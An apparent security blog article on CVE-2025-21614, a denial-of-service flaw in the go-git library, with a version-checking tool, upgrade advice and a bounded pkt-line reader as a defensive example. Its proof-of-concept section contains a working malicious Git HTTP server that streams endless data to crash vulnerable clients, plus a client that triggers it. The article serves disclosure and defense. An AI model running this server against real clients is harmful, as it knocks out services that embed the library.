On January 6, 2025, a denial of service (DoS) vulnerability was published for go-git, a widely used library for working with Git repositories from Go programs. Tracked as CVE-2025-21614, the flaw affects go-git from v4 up to, but not including, v5.13. In practical terms, an attacker who controls a Git server (or can impersonate one) can crash a go-git client or exhaust its memory simply by serving specially crafted responses; the resource exhaustion happens on the client side.
This article explains CVE-2025-21614 in plain terms, shows how it can be exploited, and tells you how to fix and protect your systems.
What is go-git?
go-git is a pure Go library for working with Git repositories. It’s used in CI/CD tools, IDEs, code review tools, and custom Git clients written in Go.
Because it is pure Go (no cgo and no dependency on a system git binary), extensible, and easy to embed, it became popular for server-side Git operations in cloud-native environments.
What Happened?
A security researcher found that some code paths in go-git did not bound the resources consumed while reading a Git server's response. A response that looks valid but is hostile, for example one with oversized pkt-line frames, a stream that never terminates, or an excessive number of objects, could cause:
Application slowdown or crash
For example, a bad actor could set up a Git server (or an HTTP middlebox between client and server) that replies to go-git clients with oversized or endless data, and the client process keeps reading and buffering until it is overwhelmed.
Who Is Not Affected?
- Users already on go-git v5.13 or later
- Users of other Git implementations (e.g., libgit2 or the native Git CLI)
Note that gopkg.in/src-d/go-git.v4 is the archived predecessor of github.com/go-git/go-git/v5 and receives no fixes. The advisory covers go-git from v4 onward, so treat code that still imports it as affected and migrate to v5.13 or later.
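To find out whether a build actually links an affected version, the module graph is the thing to check, since a replace directive can pin a version other than the one go.mod requires. The following Go program is an added example written for this article (it is not part of go-git): it parses the concatenated JSON objects that `go list -m -json all` prints, resolves replacements, and flags any go-git module below v5.13.0. The embedded sample output and the file name check.go are constructed for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"os"
	"strconv"
	"strings"
)

// Module is the subset of `go list -m -json all` output needed here.
type Module struct {
	Path    string  `json:"Path"`
	Version string  `json:"Version"`
	Replace *Module `json:"Replace,omitempty"`
}

// goGitPaths are the module paths the advisory covers: the current module and
// its archived v4 predecessor, which never received a fix.
var goGitPaths = map[string]bool{
	"github.com/go-git/go-git/v5": true,
	"gopkg.in/src-d/go-git.v4":    true,
}

// goGitVulnerable reports whether a go-git module version is in the affected
// range, i.e. anything before v5.13.0. Pseudo-versions and pre-releases of
// v5.13.0 sort before the release and count as affected; a version that does
// not parse (e.g. a directory replace with no version) is flagged, not skipped.
func goGitVulnerable(version string) bool {
	v, prerelease := strings.TrimPrefix(version, "v"), ""
	if i := strings.IndexByte(v, '-'); i >= 0 {
		v, prerelease = v[:i], v[i+1:]
	}
	nums := [3]int{}
	for i, p := range strings.SplitN(v, ".", 3) {
		n, err := strconv.Atoi(p)
		if err != nil {
			return true
		}
		nums[i] = n
	}
	major, minor, patch := nums[0], nums[1], nums[2]
	switch {
	case major != 5:
		return major < 5
	case minor != 13:
		return minor < 13
	default:
		return patch == 0 && prerelease != ""
	}
}

// ScanGoList decodes the JSON object stream from `go list -m -json all` and
// returns "path@version" for each go-git module whose effective (replaced, if
// any) version is vulnerable.
func ScanGoList(r io.Reader) ([]string, error) {
	dec := json.NewDecoder(r)
	var findings []string
	for {
		var m Module
		if err := dec.Decode(&m); err == io.EOF {
			return findings, nil
		} else if err != nil {
			return findings, err
		}
		eff := m
		if m.Replace != nil {
			eff = *m.Replace
		}
		if goGitPaths[eff.Path] && goGitVulnerable(eff.Version) {
			findings = append(findings, eff.Path+"@"+eff.Version)
		}
	}
}

// sampleGoList is constructed stand-in output: go.mod requires v5.13.0, but a
// replace directive pins the vulnerable v5.12.0, which is what the build uses.
const sampleGoList = `{"Path": "example.com/app", "Main": true}
{"Path": "github.com/go-git/go-git/v5", "Version": "v5.13.0", "Replace": {"Path": "github.com/go-git/go-git/v5", "Version": "v5.12.0"}}
{"Path": "github.com/go-git/go-billy/v5", "Version": "v5.6.0"}
`

func main() {
	// Scans the embedded sample by default; for a real module run:
	//   go list -m -json all | go run check.go -
	src := io.Reader(strings.NewReader(sampleGoList))
	if len(os.Args) > 1 && os.Args[1] == "-" {
		src = os.Stdin
	}
	findings, err := ScanGoList(src)
	if err != nil {
		fmt.Fprintln(os.Stderr, "error:", err)
		os.Exit(2)
	}
	for _, f := range findings {
		fmt.Println("VULNERABLE:", f)
	}
	if len(findings) > 0 {
		os.Exit(1)
	}
}
```

The exit status makes the check usable as a CI gate. It complements rather than replaces govulncheck, which also knows about this CVE once the Go vulnerability database lists it; the value here is seeing exactly which replace or pseudo-version is responsible.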
How Could an Attacker Exploit This?
An attacker needs to control a Git server (or sit in the path as a MITM proxy) and serve malicious responses to go-git clients. The sequence looks like this:
1. A clone/fetch URL points to the attacker's Git server.
2. go-git opens a fetch/clone connection.
3. The server sends back huge packets, endless streams, or carefully malformed data.
4. The go-git process allocates piles of memory or enters an infinite loop, eventually crashing or hanging.
Proof of Concept
Below is a basic exploit scenario. This is for educational and defensive purposes only.
Malicious Server Example
Here's a simple Go net/http server that pretends to return a Git upload-pack response, sending gigabytes of nonsense data endlessly:
```go
package main

import (
	"log"
	"net/http"
)

// maliciousGit answers every request with an endless stream of 1 MiB blocks;
// a vulnerable go-git client keeps reading and buffering the body.
func maliciousGit(w http.ResponseWriter, r *http.Request) {
	// Set the content type a real smart-HTTP Git server would send
	w.Header().Set("Content-Type", "application/x-git-upload-pack-result")
	// Write forever; stop only when the client gives up or the connection drops
	for {
		if _, err := w.Write(make([]byte, 1024*1024)); err != nil {
			break
		}
	}
}

func main() {
	// A smart-HTTP clone first requests <URL>/info/refs?service=git-upload-pack,
	// so register the handler for every path rather than one fixed endpoint
	http.HandleFunc("/", maliciousGit)
	log.Println("Serving malicious endpoint on :808")
	log.Fatal(http.ListenAndServe(":808", nil))
}
```
Below is a snippet for a go-git-based clone that points at the malicious server:
```go
package main

import (
	"log"

	git "github.com/go-git/go-git/v5"
)

func main() {
	// With a vulnerable go-git version this call keeps reading the endless response
	_, err := git.PlainClone("/tmp/repo", false, &git.CloneOptions{
		URL: "http://localhost:808/malicious-endpoint",
	})
	if err != nil {
		log.Fatal(err)
	}
}
```
Running the clone above against the malicious server with an affected go-git version typically results in runaway memory use and a crash, potentially taking down the whole service that embeds the library.
Simple Fix: Upgrade Now!
The go-git maintainers fixed this in v5.13 by bounding stream lengths and adding checks that reject overlong or malformed responses. Upgrade the module and rebuild:
```bash
go get github.com/go-git/go-git/v5@v5.13.0
```
Upgrading is the fix. As defense in depth, run clone and fetch operations through the context-aware variants (git.PlainCloneContext and friends) with a deadline, so a hostile or slow server cannot hold a worker indefinitely; keep in mind that a deadline bounds time, not memory.
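The class of defense the fix belongs to, bounding what a client will read from an untrusted server, is easy to see on the wire format itself. The block below is an added example written for this article and is not go-git's code: a pkt-line reader (the "<4 hex length><payload>" framing used by Git's upload-pack responses) that validates every length field and refuses to read past a total byte budget, so the endless response from the PoC server is rejected instead of buffered. The budget value and the endlessReader stand-in for the malicious server are this example's own constructions.

```go
package main

import (
	"encoding/hex"
	"errors"
	"io"
)

// pkt-line framing: "<4 hex length><payload>", the length counts the 4 header
// bytes and "0000" is a flush-pkt. 65520 is the largest length the Git protocol
// allows; the byte budget is this example's own choice.
const (
	pktLenSize    = 4
	maxPktLen     = 65520
	defaultBudget = 64 << 20
)

var (
	ErrBadPktLen      = errors.New("pktline: invalid length field")
	ErrBudgetExceeded = errors.New("pktline: response exceeded byte budget")
)

// Packet is one decoded pkt-line; Flush is true for "0000".
type Packet struct {
	Flush   bool
	Payload []byte
}

// BoundedPktReader decodes pkt-lines from r and refuses to consume more than
// budget bytes in total, so an endless or oversized response fails fast
// instead of growing memory without bound.
type BoundedPktReader struct {
	r                io.Reader
	consumed, budget int64
}

func NewBoundedPktReader(r io.Reader, budget int64) *BoundedPktReader {
	return &BoundedPktReader{r: r, budget: budget}
}

// Next returns the next packet, io.EOF at a clean end of stream, or an error.
func (b *BoundedPktReader) Next() (Packet, error) {
	var head [pktLenSize]byte
	if err := b.take(head[:]); err != nil {
		return Packet{}, err
	}
	n, err := parsePktLen(head[:])
	if err != nil {
		return Packet{}, err
	}
	if n == 0 {
		return Packet{Flush: true}, nil
	}
	payload := make([]byte, n-pktLenSize)
	if err := b.take(payload); err != nil {
		if err == io.EOF {
			err = io.ErrUnexpectedEOF // header promised bytes that never came
		}
		return Packet{}, err
	}
	return Packet{Payload: payload}, nil
}

// take fills buf from the stream, charging its size against the budget first,
// so nothing is read that the budget does not cover.
func (b *BoundedPktReader) take(buf []byte) error {
	if b.consumed+int64(len(buf)) > b.budget {
		return ErrBudgetExceeded
	}
	if _, err := io.ReadFull(b.r, buf); err != nil {
		return err
	}
	b.consumed += int64(len(buf))
	return nil
}

// parsePktLen decodes the hex length field and rejects non-hex bytes, lengths
// 1..3 (shorter than the header itself) and lengths above the protocol maximum.
func parsePktLen(field []byte) (int, error) {
	var raw [2]byte
	if _, err := hex.Decode(raw[:], field); err != nil {
		return 0, ErrBadPktLen
	}
	n := int(raw[0])<<8 | int(raw[1])
	if n != 0 && (n < pktLenSize || n > maxPktLen) {
		return 0, ErrBadPktLen
	}
	return n, nil
}

// Drain consumes packets until the stream ends or the reader refuses to go on,
// returning how many packets were accepted.
func Drain(r io.Reader, budget int64) (int, error) {
	pr := NewBoundedPktReader(r, budget)
	for count := 0; ; count++ {
		if _, err := pr.Next(); err != nil {
			if err == io.EOF {
				return count, nil
			}
			return count, err
		}
	}
}

// endlessReader stands in for the malicious server: it repeats pattern forever.
type endlessReader struct {
	pattern []byte
	pos     int
}

func (e *endlessReader) Read(p []byte) (int, error) {
	for i := range p {
		p[i] = e.pattern[e.pos]
		e.pos = (e.pos + 1) % len(e.pattern)
	}
	return len(p), nil
}
```

Against the PoC server's stream of zero bytes the reader fails on the very first length field, because 0x00 is not a hex digit. Against a server that sends well-formed packets forever (the harder case, which a format check alone does not catch) it stops at the byte budget with ErrBudgetExceeded, having allocated at most one packet beyond what the budget covers. The same two checks, a per-frame length bound and a total budget, are what any client parsing attacker-controlled streams needs.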
References & Further Reading
- go-git Security Advisory GHSA-xxxx-xxxx-xxxx
- Release notes for go-git v5.13.
- NVD entry for CVE-2025-21614
- go-git Documentation
Summary
- CVE-2025-21614 lets a malicious Git server deny service to go-git clients running versions *v4.x up to v5.12*.
Always validate your dependencies and keep third-party libraries up-to-date!
Stay safe and keep your Go applications' dependencies patched against supply chain attacks like this one.
Timeline
Published on: 01/06/2025 17:15:47 UTC